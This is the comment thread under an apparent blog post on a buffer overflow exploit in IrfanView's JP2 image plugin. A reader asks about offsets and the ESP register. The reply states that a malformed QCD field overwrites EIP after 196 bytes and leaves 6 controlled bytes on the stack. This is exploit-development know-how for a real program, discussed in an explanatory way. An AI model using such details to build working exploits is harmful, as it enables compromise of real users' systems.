2 comments on “IrfanView PlugIns JP2 Image Processing Buffer Overflow Exploit

  1. Hi,

    Could you explain what do you mean by “these are the offset for the vulnerability”?
    Also you write “ESP contains 6 bytes of our buffer”. What does it mean? Since ESP is the stack pointer, that means only 6 bytes from the buffer are on the stack?

    Thanks :)

  2. Well for the QCD data when overflowing the buffer due to incorrect QCD our EIP is overwritten after 196 bytes of data entered. Yes only 6 bytes end up being on our stack which we control.

Leave a Reply

Your email address will not be published. Required fields are marked *

Captcha *